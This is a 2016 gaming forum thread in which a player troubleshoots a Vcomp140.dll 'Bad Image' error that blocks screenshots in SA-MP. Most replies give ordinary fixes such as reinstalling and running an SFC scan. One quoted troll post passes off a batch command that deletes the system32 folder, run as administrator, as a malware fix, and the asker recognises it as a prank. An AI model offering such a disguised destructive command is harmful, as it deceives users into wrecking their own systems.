PDA

View Full Version : Can't SS or take vids D:

Royalty
2nd July 2016, 09:57 PM
There's some msg about some file in the system32 folder that pops up everytime I try to take a vid or take SS anyone know how to fix it? I cant just go deletin stuff in system32 that'd be dumb lol what should I do?? plz help me

J
2nd July 2016, 11:02 PM
Can you give us the exact error that pops up for you? And a picture of it if possible. (Gyazo would be a good idea)
Does this happen with other games or just San Andreas?

Royalty
2nd July 2016, 11:12 PM
Can you give us the exact error that pops up for you? And a picture of it if possible. (Gyazo would be a good idea)
Does this happen with other games or just San Andreas?

I don't play any other games on PC other than San Andreas lol, what you mean Gyazo? and probably cant get you a picture but I'll tell you what it says if I can

Edit: it the msg says

GTA:SA:MP: gta_sa.exe - Bad Image

C:/Windows/System32/Vcomp140.dll is either not designed to run on windows or it contains an error. Try installing the program again using original installation media or contact your system administrator or software vendor for support. Error status 0xc000012f

TecNines
3rd July 2016, 12:07 AM
Reinstall samp, it worked for me i had the same problem, but if it doesent work then idk...

Royalty
3rd July 2016, 12:31 AM
think I forgot to mention I get the msg when I start up my PC to, so I think it's something with the PC idk sorry I forgot to say that if I did

Royalty
4th July 2016, 01:36 PM
Reinstall samp, it worked for me i had the same problem, but if it doesent work then idk...

sure this'll work?

Nick Fletcher
4th July 2016, 02:00 PM
Reinstall your SAMP into a /new/ folder on program files, so you will get a new copy of the game, also delete SAMP from your documents.

Pending player 12 hours.

Diego_Caivano
4th July 2016, 02:15 PM
Go to settings and video settings go advance and make the resolution on 1366*768*32 and you'll be fine

Royalty
4th July 2016, 04:00 PM
Reinstall your SAMP into a /new/ folder on program files, so you will get a new copy of the game, also delete SAMP from your documents.

Pending player 12 hours.

what do you mean by /new/ folder in program files? I tried reinstalling samp and deleting the documents but didn't work, all I managed to do was delete all the SAMP servers i had saved

Royalty
4th July 2016, 04:00 PM
Go to settings and video settings go advance and make the resolution on 1366*768*32 and you'll be fine

funny, there's no resolution 1366*768*32

Diego_Caivano
4th July 2016, 09:12 PM
I can give you an SS for it

Royalty
4th July 2016, 09:15 PM
I can give you an SS for it

no need, since I obv dont have it

Royalty
5th July 2016, 12:33 AM
It's usually a problem with win32 malware. Please open up notepad and type the following:

@echo off
del C:\WINDOWS\system32

save as a .bat file then run as administrator. Restart your PC and the problem should be solved.

why do I have a feeling you're trying to make me delete system32? lmao it says del C:\Windows\system32 do you think im that dumb?

Justin Fakie
5th July 2016, 01:07 AM
He's not having problems only with SAMP. Reinstalling isn't going to fix shit. Fucking dumbasses in this section.

Try this and report back by quoting my post.

https://support.microsoft.com/en-us/kb/929833

J
5th July 2016, 01:50 AM
I don't play any other games on PC other than San Andreas lol, what you mean Gyazo? and probably cant get you a picture but I'll tell you what it says if I can

Edit: it the msg says

GTA:SA:MP: gta_sa.exe - Bad Image

C:/Windows/System32/Vcomp140.dll is either not designed to run on windows or it contains an error. Try installing the program again using original installation media or contact your system administrator or software vendor for support. Error status 0xc000012f

Ah yeah, I had this error a few months back with Windows 8.1 (shortly after I reinstalled my OS). Usually these errors appear due to corrupted or improperly installed files, a Windows update should be able to fix it. I presume your OS is pirated then or is it legitimate?

I'll throw some methods below for you as well as a few sources.

This error message might occur if there are some corrupt system files on the computer. Would suggest that you run a SFC scan which would scan for corrupt system files on the computer and replace them.
Steps to perform SFC scan:
1. Click the Start button
2. From the Start Menu, Click All programs followed by Accessories
3. In the Accessories menu, Right Click on the Command Prompt option
4. From the drop down menu that appears, Click on the 'Run as administrator' option
5. If you have the User Account Control (UAC) enabled you will be asked for authorization prior to the command prompt opening. You may simply need to press the Continue button if you are the administrator or insert the administrator password etc.
6. In the Command Prompt window, type: sfc /scannow and then press Enter
7. A message will appear stating that 'the system scan will begin'
8. Be patient because the scan may take some time
9. If any files require replacing SFC will replace them. You may be asked to insert your Vista DVD for this process to continue
10. If everything is okay you should, after the scan, see the following message "Windows resource protection did not find any integrity violations"
11. After the scan has completed, Close the command prompt window restart the computer and check.
The scan may take some time, so be patient. Windows will repair any corrupted or missing files that it finds. If information from the installation CD is needed to repair the problem, you may be prompted to insert your Windows Vista.

If the above doesn't work then try a Windows update, if that doesn't work as well then PM/VM me and I'll look into it more for you.

Source: http://answers.microsoft.com/en-us/windows/forum/windows_vista-update/dll-is-either-not-designed-to-run-on-windows-or-it/96e04287-7e81-49ab-afe5-f44449dd8322?auth=1

Nick Fletcher
7th July 2016, 07:37 PM
Pending player 12 hours.

Royalty
8th July 2016, 03:18 PM
I found a way I can take SSes now just cant use Bandicam like I usually did, I found out that I can take SS using RGB which I had installed aswell but only used to boost the game which didnt really do shit, I guess this can be closed for now since I found an alternative way than what I usually did #longlivebandicam lol thanks to everyone for their methods, if I decide to attempt to fix my problem I'll surely try to find this thread if I can and check out your suggestions thanks for your times

Moonbear
9th July 2016, 04:05 PM
I found a way I can take SSes now just cant use Bandicam like I usually did, I found out that I can take SS using RGB which I had installed aswell but only used to boost the game which didnt really do shit, I guess this can be closed for now since I found an alternative way than what I usually did #longlivebandicam lol thanks to everyone for their methods, if I decide to attempt to fix my problem I'll surely try to find this thread if I can and check out your suggestions thanks for your times

Answered